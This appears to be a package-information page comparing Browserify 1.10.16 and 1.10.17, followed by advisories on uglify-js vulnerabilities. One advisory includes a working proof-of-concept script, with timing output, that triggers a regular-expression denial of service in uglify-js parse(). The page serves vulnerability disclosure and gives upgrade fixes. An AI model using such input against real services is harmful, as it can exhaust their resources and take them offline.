Browserify, a crucial tool for front-end developers, enables the use of Node.js-style require() statements in browser-based JavaScript. Comparing versions 1.10.17 and 1.10.16, reveals nuanced changes primarily in the development dependencies, hinting at internal build process improvements and testing harness adjustments.
Both versions share identical core functionalities: browser-side module bundling, allowing developers to organize JavaScript code into reusable modules and leverage the vast npm ecosystem within the browser environment. Key dependencies like nub, deputy, resolve, optimist, commondir, detective, coffee-script, vm-browserify, http-browserify, and crypto-browserify remain consistent solidifying the versions core functionality.
The significant difference lies in the devDependencies. Version 1.10.17 upgraded the dnode dependency from ">=0.7.1 <0.8" to "~0.9.11". This suggests a shift to a newer, potentially more stable or feature-rich version of dnode for internal testing or development purposes. While not directly affecting runtime behavior for end users, this update reflects ongoing maintenance and upgrades to development tools. This change can benefit developers by using the latest version of the tools used for testing or development.
For developers using Browserify, both versions 1.10.16 and 1.10.17 offer reliable browser-side module bundling. While v1.10.17 incorporates a dnode update, the core usage and API of Browserify remain unchanged. Developers can safely upgrade without anticipating any breaking changes as v1.10.17 is a minor patch update that likely focused on internal tooling. Both versions are licensed under MIT/X11.
All the vulnerabilities related to the version 1.10.17 of the package
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.